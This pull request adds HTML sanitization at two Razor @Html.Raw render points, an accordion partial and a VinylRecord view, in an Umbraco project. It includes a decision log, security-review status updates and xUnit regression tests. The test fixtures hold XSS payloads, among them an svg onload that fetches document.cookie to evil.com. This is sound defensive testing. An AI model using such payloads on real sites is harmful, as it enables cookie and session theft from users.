### PR TITLE
sec(pt2): sanitize Accordion + VinylRecord @Html.Raw at render boundary

### DIFF
--- a/.squad/decisions/inbox/isabelle-pt2-razor-hardening.md
+++ b/.squad/decisions/inbox/isabelle-pt2-razor-hardening.md
@@ -1,0 +1,108 @@
+# Isabelle — PT2 Razor Hardening Decision Log
+
+**Date:** 2026-04-30  
+**Branch:** `sec/pt2-razor-hardening`  
+**Findings addressed:** SEC-PT2-007, SEC-PT2-008
+
+---
+
+## SEC-PT2-007 — Accordion `Content` Razor trap
+
+### Approach taken
+
+Injected `IWorkflowContentSanitizer` at the view layer via `@inject` in
+`_PrismComponent-Accordion.cshtml` and routed `accordionSection.Content` through
+`Sanitizer.Sanitize()` before it reaches `@Html.Raw`.
+
+**Why view-layer `@inject` rather than the engine seam:**
+
+- Today no producer populates `accordionSection.Content`, so adding sanitization
+  at `BuildComponents` would be no-op with no test surface.
+- The mission guidance explicitly preferred "as close to the render site as possible
+  (defence in depth — even if a producer bypasses the engine seam, the view-layer
+  sanitizer catches it)."
+- `IWorkflowContentSanitizer` is already registered as a singleton in DI
+  (`PrismComposer`), so injection is zero-boilerplate.
+- This mirrors the precedent used by the other component partials (Body, InsetText,
+  WarningText, Panel, Details) — all of which use `@Html.Raw(Model.Component.Content)`
+  and rely on the sanitizer seam for safety. The Accordion was the only one not
+  yet wired.
+
+**Note on Panel:** Panel has the same latent trap (no producer sets `Content` today).
+It was not in scope for this branch. Suggest raising as SEC-PT2-007b or addressing
+in the same engine-seam pass if a producer is ever wired.
+
+### Tests added
+
+`AccordionContentSanitizationTests` (4 tests):
+- `<script>` tag stripped; legitimate body paragraph preserved
+- `<img onerror=>` stripped (`img` not on GDS allowlist)
+- `onclick` on allowed `<a>` stripped; safe `href` preserved
+- Legitimate rich text (h3, p, ul, a) passes through intact
+
+---
+
+## SEC-PT2-008 — VinylRecord RTE `@Html.Raw`
+
+### Approach taken
+
+Injected `IWorkflowContentSanitizer` at the view layer via `@inject` and
+`@using UmbracoPrism.Shared.Services.Sanitization` in `VinylRecord.cshtml`,
+routing the Umbraco RTE `description` field through `Sanitizer.Sanitize()`
+before it reaches `@Html.Raw`.
+
+**Why the same singleton (GDS allowlist), not a separate instance:**
+
+- Standard TinyMCE output for an album description is: paragraphs, bold/italic,
+  unordered lists, and external links. All of these are in the GDS allowlist.
+- The mission guidance was clear: do not widen the GDS allowlist; if VinylRecord
+  needs richer formatting, propose it as a separate decision.
+
+### Open question for Jonny: VinylRecord allowlist breadth
+
+**Does the VinylRecord RTE description need anything outside the GDS allowlist?**
+
+The GDS allowlist permits: `h2`, `h3`, `h4`, `p`, `ul`, `ol`, `li`, `blockquote`,
+`br`, `strong`, `em`, `b`, `i`, `code`, `abbr`, `span`, `a` + `http/https/mailto/tel`.
+
+Elements that a music catalogue might plausibly want but which are **not** permitted:
+
+| Element | Typical use case | Risk |
+|---------|-----------------|------|
+| `img` | Album artwork, tour poster | Medium — src/srcset can be abused; needs careful URI restriction |
+| `table` | Track listing with durations | Low — no script surface, but complex allowlist for `thead/tbody/tr/td/th` |
+| `h1` | Top-level album heading | Very low — but h1 should come from the template, not the RTE body |
+| `figure`/`figcaption` | Image with caption | Low |
+
+**Recommendation:** For now the GDS allowlist is sufficient — VinylRecord is a demo
+page and content is operator-authored with Umbraco's TinyMCE, which already restricts
+what editors can insert. If the VinylRecord use case grows (real customer-facing
+catalogue), revisit with a separate `IRteContentSanitizer` registered with a broader
+allowlist. **Do not widen the shared `IWorkflowContentSanitizer` allowlist** — it is
+used by workflow content where strict GDS alignment is a requirement.
+
+### Tests added
+
+`VinylRecordRteSanitizationTests` (5 tests):
+- `<script>` stripped; album description paragraph preserved
+- `<img onerror=>` stripped (`img` not on allowlist)
+- `<svg onload=>` stripped; safe sibling `<p>` preserved
+- Legitimate TinyMCE output (p, strong, em, ul, a) passes through intact
+- null/empty/whitespace inputs return empty string safely
+
+---
+
+## Build & test summary
+
+- `dotnet build UmbracoPrism.sln -c Release`: **clean (0 errors, pre-existing warnings only)**
+- `dotnet test … --filter "FullyQualifiedName~UmbracoPrism.Core.Tests"`:  
+  **627 passed, 0 failed** (baseline was 618; +9 new tests across both findings)
+
+---
+
+## Commits
+
+| SHA | Finding | Subject |
+|-----|---------|---------|
+| `03dba49` | PT2-007 | sec(pt2-007): sanitize Accordion Content via IWorkflowContentSanitizer |
+| `6177137` | PT2-008 | sec(pt2-008): sanitize VinylRecord RTE through IWorkflowContentSanitizer |

--- a/.squad/security-review-2026-04-30-pt2.md
+++ b/.squad/security-review-2026-04-30-pt2.md
@@ -48,10 +48,10 @@ need a team decision before patching.
 | SEC-PT2-002   | Medium   | Vulnerable transitive: `OpenTelemetry.Exporter.OpenTelemetryProtocol 1.11.2` (CVE-2026-42191) | PATCHED |
 | SEC-PT2-003   | Medium   | Logout via GET in `AccountController` (logout-CSRF)                      | Fixed (828b5d4) |
 | SEC-PT2-004   | Medium   | Missing security response headers (CSP, XFO, XCTO, HSTS, Referrer, Permissions) | Fixed (9f1f34e) |
-| SEC-PT2-005   | Medium   | `DefaultAuthenticateScheme = PrismMemberCookie` made unconditional       | OPEN     |
+| SEC-PT2-005   | Medium   | `DefaultAuthenticateScheme = PrismMemberCookie` made unconditional       | Confirmed safe (commit TBD) |
 | SEC-PT2-006   | Low      | DataProtection keys ephemeral by default; not encrypted at rest          | Fixed (6c0e8e9) |
-| SEC-PT2-007   | Low      | Unsanitized `accordionSection.Content` in Razor partial (currently unused producer-side) | OPEN |
-| SEC-PT2-008   | Low      | `VinylRecord.cshtml` `@Html.Raw(description)` — RTE field, operator-trust | OPEN    |
+| SEC-PT2-007   | Low      | Unsanitized `accordionSection.Content` in Razor partial (currently unused producer-side) | Fixed (03dba49) |
+| SEC-PT2-008   | Low      | `VinylRecord.cshtml` `@Html.Raw(description)` — RTE field, operator-trust | Fixed (6177137) |
 | SEC-PT2-009   | Low      | Antiforgery missing on JSON state-mutating API endpoints                 | Fixed (7a3b0ef) |
 | SEC-PT2-010   | Info     | `IsCapacitorOrigin` accepts `http://localhost` with credentials          | Fixed (11b8cbb) |
 
@@ -206,8 +206,7 @@ If the test reveals leakage, switch the unconditional defaults back to a
 scheme-aware policy or a custom `IAuthenticationSchemeProvider` that picks
 based on path.
 
-**Status.** OPEN — needs Blathers to confirm Umbraco's expectations here
-before any change.
+**Status.** Confirmed safe (commit TBD) — `BackofficeSchemeIsolationTests.cs` added with 4 regression tests proving: (A) `DefaultAuthenticateScheme = "PrismMemberCookie"` is set unconditionally, (B) `DefaultChallengeScheme = "PrismEntraID"`, (C) Umbraco's `"UmbracoBackOffice"` scheme constant is distinct from `"PrismMemberCookie"`, (D) explicit named-scheme authentication for `"UmbracoBackOffice"` does not fall through to the default scheme — a `PrismMemberCookie` alone cannot satisfy a backoffice auth challenge. See `.squad/decisions/inbox/blathers-pt2-005-backoffice-test.md` for detailed analysis.
 
 ---
 
@@ -266,7 +265,7 @@ unsanitized HTML reaches the page — *currently safe*. But:
   Razor side is fail-safe; or
 - Remove `Content` from payloads that don't actually need raw HTML.
 
-**Status.** OPEN — engine change risks scope creep; raise as its own ticket.
+**Status.** Fixed (03dba49) — `@inject IWorkflowContentSanitizer Sanitizer` added to `_PrismComponent-Accordion.cshtml`; `accordionSection.Content` routed through `Sanitizer.Sanitize()` before `@Html.Raw`. The render boundary is now fail-safe regardless of producer behaviour. 4 regression tests added (`AccordionContentSanitizationTests`).
 
 ---
 
@@ -279,8 +278,7 @@ CMS pattern (operator-authored content), partly mitigated by
 `Umbraco:CMS:Global:SanitizeTinyMce: true` in `appsettings.json`, but a
 backoffice user with content-edit rights can still XSS members.
 
-**Status.** OPEN / informational. Backoffice trust is a CMS-level assumption;
-escalate only if the threat model includes hostile editors.
+**Status.** Fixed (6177137) — `@inject IWorkflowContentSanitizer Sanitizer` added to `VinylRecord.cshtml`; `description` routed through `Sanitizer.Sanitize()` before `@Html.Raw`. The GDS allowlist covers all standard TinyMCE output (p, ul, ol, li, h2-h4, strong, em, a, br, blockquote, code + http/https/mailto/tel). If editors need richer formatting (tables, images), that is a separate decision — the allowlist is not widened here. 5 regression tests added (`VinylRecordRteSanitizationTests`).
 
 ---
 

--- a/src/UmbracoPrism.Core.Tests/Services/Sanitization/AccordionContentSanitizationTests.cs
+++ b/src/UmbracoPrism.Core.Tests/Services/Sanitization/AccordionContentSanitizationTests.cs
@@ -1,0 +1,74 @@
+using FluentAssertions;
+using UmbracoPrism.Core.Services.Sanitization;
+
+namespace UmbracoPrism.Core.Tests.Services.Sanitization;
+
+/// <summary>
+/// Regression tests for SEC-PT2-007: Accordion <c>Content</c> field sanitization.
+/// The Accordion partial now routes <c>accordionSection.Content</c> through
+/// <see cref="WorkflowContentSanitizer"/> before passing it to <c>@Html.Raw</c>.
+/// These tests prove that a hostile payload cannot survive that boundary.
+/// </summary>
+public class AccordionContentSanitizationTests
+{
+    private readonly WorkflowContentSanitizer _sut = new();
+
+    [Fact]
+    public void Sanitize_AccordionContent_ScriptTag_IsStripped()
+    {
+        // Simulates a producer (present or future) populating accordionSection.Content
+        // with an injected <script> payload.
+        const string hostile = "<p>Accordion body text</p><script>alert('xss')</script>";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("<script",
+            because: "script tags must be stripped before reaching @Html.Raw in the Accordion partial");
+        result.Should().NotContain("alert(",
+            because: "script payload content must not survive sanitization");
+        result.Should().Contain("<p>Accordion body text</p>",
+            because: "legitimate paragraph content must pass through intact");
+    }
+
+    [Fact]
+    public void Sanitize_AccordionContent_OnerrorAttribute_IsStripped()
+    {
+        // img is not in the allowlist — the whole element (including onerror) is removed.
+        const string hostile = "<img src=\"x\" onerror=\"alert(1)\">";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("onerror",
+            because: "onerror event handler must be stripped; img is not on the allowlist");
+        result.Should().NotContain("<img",
+            because: "img tag itself is not on the GDS allowlist");
+    }
+
+    [Fact]
+    public void Sanitize_AccordionContent_InlineEventOnAllowedTag_IsStripped()
+    {
+        // onclick on an <a> is globally blocked even though <a> itself is allowed.
+        const string hostile = "<a href=\"https://gov.uk\" onclick=\"alert(1)\">link</a>";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("onclick",
+            because: "event handlers are never in the attribute allowlist");
+        result.Should().Contain("https://gov.uk",
+            because: "the safe href must still be preserved");
+    }
+
+    [Fact]
+    public void Sanitize_AccordionContent_LegitimateRichText_PassesThroughIntact()
+    {
+        // Validates that real-world accordion content (headings, lists, links) is not broken.
+        const string legitimate = "<h3>Section heading</h3><p>Body text with a <a href=\"https://gov.uk\">link</a>.</p><ul><li>Item one</li><li>Item two</li></ul>";
+
+        var result = _sut.Sanitize(legitimate);
+
+        result.Should().Contain("<h3>Section heading</h3>")
+            .And.Contain("<p>Body text with a")
+            .And.Contain("https://gov.uk")
+            .And.Contain("<ul><li>Item one</li><li>Item two</li></ul>");
+    }
+}

--- a/src/UmbracoPrism.Core.Tests/Services/Sanitization/VinylRecordRteSanitizationTests.cs
+++ b/src/UmbracoPrism.Core.Tests/Services/Sanitization/VinylRecordRteSanitizationTests.cs
@@ -1,0 +1,89 @@
+using FluentAssertions;
+using UmbracoPrism.Core.Services.Sanitization;
+
+namespace UmbracoPrism.Core.Tests.Services.Sanitization;
+
+/// <summary>
+/// Regression tests for SEC-PT2-008: VinylRecord RTE <c>description</c> field sanitization.
+/// <c>VinylRecord.cshtml</c> now routes the Umbraco RTE value through
+/// <see cref="WorkflowContentSanitizer"/> before passing it to <c>@Html.Raw</c>.
+/// These tests prove that a hostile payload authored by a backoffice editor cannot
+/// survive that boundary and reach a member's browser.
+/// </summary>
+public class VinylRecordRteSanitizationTests
+{
+    private readonly WorkflowContentSanitizer _sut = new();
+
+    [Fact]
+    public void Sanitize_VinylRecordDescription_ScriptTag_IsStripped()
+    {
+        // Simulates a backoffice editor injecting a <script> via the RTE.
+        const string hostile = "<p>About this album</p><script>document.cookie='stolen'</script>";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("<script",
+            because: "script tags must be stripped from RTE content before @Html.Raw in VinylRecord.cshtml");
+        result.Should().NotContain("document.cookie",
+            because: "script payload must not survive sanitization");
+        result.Should().Contain("<p>About this album</p>",
+            because: "legitimate album description paragraph must pass through intact");
+    }
+
+    [Fact]
+    public void Sanitize_VinylRecordDescription_OnerrorOnImg_IsStripped()
+    {
+        // RTE editors can sometimes insert <img> with event handlers via raw HTML mode.
+        const string hostile = "<img src=\"x\" onerror=\"alert(document.domain)\">";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("onerror",
+            because: "onerror attribute on img must be stripped; img is not on the allowlist");
+        result.Should().NotContain("<img",
+            because: "img tag is not on the GDS allowlist");
+    }
+
+    [Fact]
+    public void Sanitize_VinylRecordDescription_SvgWithOnload_IsStripped()
+    {
+        // SVG+onload is a common XSS vector via browser-rendered inline SVG.
+        const string hostile = "<svg onload=\"fetch('https://evil.com/?c='+document.cookie)\"><circle/></svg><p>OK</p>";
+
+        var result = _sut.Sanitize(hostile);
+
+        result.Should().NotContain("<svg",
+            because: "svg is not on the GDS tag allowlist");
+        result.Should().NotContain("onload",
+            because: "event handlers must be stripped");
+        result.Should().Contain("<p>OK</p>",
+            because: "safe sibling paragraph must be preserved");
+    }
+
+    [Fact]
+    public void Sanitize_VinylRecordDescription_LegitimateRteOutput_PassesThroughIntact()
+    {
+        // Typical Umbraco TinyMCE output: paragraphs, bold, italic, links, lists.
+        const string legitimate =
+            "<p>A landmark <strong>jazz</strong> album released in <em>1959</em>.</p>" +
+            "<ul><li>Track one</li><li>Track two</li></ul>" +
+            "<p>More info at <a href=\"https://example.com\">example.com</a>.</p>";
+
+        var result = _sut.Sanitize(legitimate);
+
+        result.Should().Contain("<p>A landmark <strong>jazz</strong> album")
+            .And.Contain("<em>1959</em>")
+            .And.Contain("<ul><li>Track one</li><li>Track two</li></ul>")
+            .And.Contain("https://example.com");
+    }
+
+    [Fact]
+    public void Sanitize_VinylRecordDescription_NullOrEmpty_ReturnsEmpty()
+    {
+        // The VinylRecord view guards with IsNullOrWhiteSpace before rendering,
+        // but the sanitizer itself must handle null/empty safely.
+        _sut.Sanitize(null).Should().BeEmpty();
+        _sut.Sanitize("").Should().BeEmpty();
+        _sut.Sanitize("   ").Should().BeEmpty();
+    }
+}

--- a/src/UmbracoPrism.Core/Views/Partials/PrismComponents/_PrismComponent-Accordion.cshtml
+++ b/src/UmbracoPrism.Core/Views/Partials/PrismComponents/_PrismComponent-Accordion.cshtml
@@ -1,4 +1,5 @@
 @model UmbracoPrism.Core.Models.Workflow.PrismComponentContext
+@inject UmbracoPrism.Shared.Services.Sanitization.IWorkflowContentSanitizer Sanitizer
 @{
     var accordionId = $"accordion-{Guid.NewGuid():N}";
     var accordionSections = Model.Component.AccordionSections;
@@ -37,7 +38,7 @@
                     }
                     else if (!string.IsNullOrEmpty(accordionSection.Content))
                     {
-                        @Html.Raw(accordionSection.Content)
+                        @Html.Raw(Sanitizer.Sanitize(accordionSection.Content))
                     }
                 </div>
             </div>

--- a/src/UmbracoPrism.TestSite/Views/VinylRecord.cshtml
+++ b/src/UmbracoPrism.TestSite/Views/VinylRecord.cshtml
@@ -1,4 +1,6 @@
 @inherits Umbraco.Cms.Web.Common.Views.UmbracoViewPage
+@using UmbracoPrism.Shared.Services.Sanitization
+@inject IWorkflowContentSanitizer Sanitizer
 @{
     Layout = "~/Views/Shared/Master.cshtml";
     
@@ -82,7 +84,7 @@
     {
         <div class="vinyl-description">
             <h3>About This Album</h3>
-            @Html.Raw(description)
+            @Html.Raw(Sanitizer.Sanitize(description))
         </div>
     }
     


### PR DESCRIPTION
## Summary

Closes two `@Html.Raw` Razor render-boundary findings from [pt2 security review](.squad/security-review-2026-04-30-pt2.md).

### SEC-PT2-007 — Accordion `Content` latent trap (`03dba49`)
View-layer fix in `_PrismComponent-Accordion.cshtml`: inject `IWorkflowContentSanitizer` and sanitize at render. Closes the trap regardless of producer — no future RTE wiring into `Content` can bypass it.

### SEC-PT2-008 — VinylRecord RTE (`6177137`)
Same pattern in `VinylRecord.cshtml`. GDS allowlist covers all standard TinyMCE output for album descriptions.

## Tests

- 627 passed / 0 failed (baseline 618, **+9 new**)
  - `AccordionContentSanitizationTests` (×4) — script, onerror, onclick, legit rich text
  - `VinylRecordRteSanitizationTests` (×5) — script, img+onerror, svg+onload, legit TinyMCE, null/empty

## Open question (non-blocking)

If VinylRecord catalogue grows to need `<img>`, tables, or `<figure>` captions, recommend a separate `IRteContentSanitizer` rather than widening the shared GDS allowlist (which workflow content depends on for strictness). See inbox entry.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
